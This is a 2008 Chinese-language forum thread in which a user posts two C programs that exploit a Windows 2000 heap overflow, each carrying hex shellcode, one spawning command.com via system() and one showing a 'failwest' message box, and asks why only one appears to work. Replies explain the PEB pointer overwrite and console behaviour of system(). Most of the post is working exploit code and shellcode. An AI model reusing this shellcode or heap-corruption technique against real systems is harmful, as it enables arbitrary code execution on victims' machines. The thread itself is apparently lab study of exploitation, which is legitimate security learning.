首页
社区
课程
招聘
[求助]同样大小的shellcode为什么不能执行?
2008-11-14 10:57 4617

[求助]同样大小的shellcode为什么不能执行?

2008-11-14 10:57
4617
大家看下面的两端代码,shellcode的长度一样,我在win2000虚拟机里测试,为什么一个能弹出failwest,另一个是开cmd的却不行呢(单独测试shellcode是可以成功执行的)?

代码一:
#include <windows.h>
#include <stdio.h>
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\xB8\x20\xF0\xFD\x7F"  //MOV EAX,7FFDF020
"\xBB\xE0\x7E\xF8\x77"  //MOV EBX,77F8AA4C the address here may releated to your OS
"\x89\x18"        //MOV DWORD PTR DS:[EAX],EBX
"\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
"\x6D\x02\xE8\x77"        //sp4 loadlibrary地址0x77e8026d
"\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
"\x50\xB8"
"\xBF\x8E\x01\x78"                //sp4 system地址0x78018EBF
"\xFF\xD0"
"\x16\x01\x1A\x00\x00\x10\x00\x00"
"\x88\x06\x36\x00\x20\xf0\xfd\x7f";

main()
{
        HLOCAL h1 = 0, h2 = 0;
        HANDLE hp;
        hp = HeapCreate(0,0x1000,0x10000);
        printf("%p",hp);
        h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,200);
        memcpy(h1,shellcode,0x200);
        h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
        return 0;
}

代码二:
大家看下面的两端代码,shellcode的长度一样,我在win2000虚拟机里测试,为什么一个能弹出failwest,另一个是开cmd的却不行呢(单独测试shellcode是可以成功执行的)?

#include <windows.h>
#include <stdio.h>
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\xB8\x20\xF0\xFD\x7F"  //MOV EAX,7FFDF020
"\xBB\xE0\x7E\xF8\x77"  //MOV EBX,77F8AA4C the address here may releated to your OS
"\x89\x18"        //MOV DWORD PTR DS:[EAX],EBX
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x16\x01\x1A\x00\x00\x10\x00\x00"
"\x88\x06\x36\x00\x20\xf0\xfd\x7f";

main()
{
        HLOCAL h1 = 0, h2 = 0;
        HANDLE hp;
        hp = HeapCreate(0,0x1000,0x10000);
        printf("%p",hp);
        h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,200);
        memcpy(h1,shellcode,0x200);
        h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
        return 0;
}

[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。

收藏
点赞0
打赏
分享
最新回复 (6)
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
cnben 2008-11-16 09:48
2
0
牛人们回答我一下啊
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
cnben 2008-11-16 22:02
3
0
顶到有人回答为止
雪    币: 2108
活跃值: (21)
能力值: (RANK:260 )
在线值:
发帖
回帖
粉丝
书呆彭 6 2008-11-16 22:13
4
0
你能解释一下前两个地址,就是

"\xB8\x20\xF0\xFD\x7F"  //MOV EAX,7FFDF020
"\xBB\xE0\x7E\xF8\x77"  //MOV EBX,77F8AA4C the address here may releated to your OS

是什么的地址,我好在我机器上测试一下。我可没有Win2000
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
cnben 2008-11-17 09:19
5
0
哈哈,终于有人回答了。
书上说win2000和winxpsp1下的0x7FFDF000为peb的加载基址,偏移20的地方存放了RtlEnterCriticalSection的入口地址,在我本机上调0x7FFDF020不会变,但是里面的值不同,我本机上是0x77f8aa4c,这两句就是在执行shellcode前把前面用堆溢出破坏掉的RtlEnterCriticalSection恢复,因为shellcode里面同样要调用它,避免shellcode也不能执行。
大哥,谢谢啊。帮帮看看两端同样长度的shellcode为什么一段不能执行。
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
cnben 2008-11-20 09:36
6
0
顶啊,还没人回答吗
雪    币: 2108
活跃值: (21)
能力值: (RANK:260 )
在线值:
发帖
回帖
粉丝
书呆彭 6 2008-11-20 13:58
7
0
经过测试,这个溢出在winxp sp3上不可行。

第二次HeapAlloc直接失败,并不进入shellcode执行。

不过你这个问题我已经明白了。

你直接反汇编一下你的shellcode,你看看就知道了。

你执行的是system("command.com");

如果在你的实验平台上,可以成功跳到shellcode的话,是可以成功执行的。

你所说的没有弹出cmd窗口,你直接运行一个cmd,然后打command.com命令就知道了。

command.com使用父进程的控制台的,根本不开新窗口。

而且cmd.exe也一样,新进程确实运行了,但不打开新的控制台窗口。

原因在于system函数的特性,它不会给子进程创建新的控制台。

你可以给system("start cmd");

start命令会给子进程创建新的控制台。

看来你编程的经验还差点。
游客
登录 | 注册 方可回帖
返回